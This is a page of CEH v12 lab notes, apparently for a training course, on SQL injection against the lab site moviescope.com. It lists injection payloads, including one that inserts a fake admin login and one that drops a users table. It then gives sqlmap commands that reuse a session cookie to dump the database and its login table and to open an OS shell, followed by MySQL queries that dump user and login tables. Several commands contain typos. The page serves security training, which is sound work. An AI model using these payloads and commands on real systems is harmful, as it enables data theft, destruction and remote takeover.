1. Perform SQL Injection attacks

SQL injection attacks are performed on SQL databases with weak codes that do not adequately filter, use strong typing, or correctly execute user input.

1. SQL Injection on MSSQL Database

Payloads to check the injection

'OR 1=1 --

Operations on database

Admin'; Insert into login values('john','apple123');--  //adding entry
blah'; DROP TABLE users; --

2. Extract MSSQL Database with SQL MAP

  1. Navigate to http://www.moviescope.com/. A Login page loads; enter the Username and Password as sam and test, respectively. Click the Login button.

    If a Would you like Firefox to save this login for moviescope.com? notification appears at the top of the browser window, click Don’t Save.

  2. Once you are logged into the website, click the View Profile tab on the menu bar and, when the page has loaded, make a note of the URL in the address bar of the browser.

  3. Right-click anywhere on the webpage and click Inspect (Q) from the context menu, as shown in the screenshot.

  4. The Developer Tools frame appears in the lower section of the browser window. Click the Console tab, type document.cookie in the lower-left corner of the browser, and press Enter.

  5. Select the cookie value, then right-click and copy it, as shown in the screenshot. Minimize the web browser. Note down the URL of the web page.

  6. Open a Terminal window and execute sudo su to run the programs as a root user (When prompted, enter the password toor).

To retrieve cookie from console

document.cookie

Now use the following commands to extract the database.

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl="; --dbs
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moveiscope --tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump

To get a shell

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell
TASKLIST
help

MySQL commands

mysql -U qdpmadmin -h 192.168.1.8 -P passwod 
show databases;
use qdpm;
show tables'
select * from users;
show dtabases;
use staff;
show tables;
select * from login;
select * from user;

You can also use other SQL injection tools such as Mole (https://sourceforge.net), jSQL Injection (https://github.com), NoSQLMap (https://github.com), Havij (https://github.com) and blind_sql_bitshifting (https://github.com).

SQL Map Tutorial

LogoCertified Ethical Hacker (CEHv12) Practical hands on LabsUdemy
PreviousModule 15. SQL InjectionNext2. Detect SQL Vulnerabilities using different tool

Last updated

Was this helpful?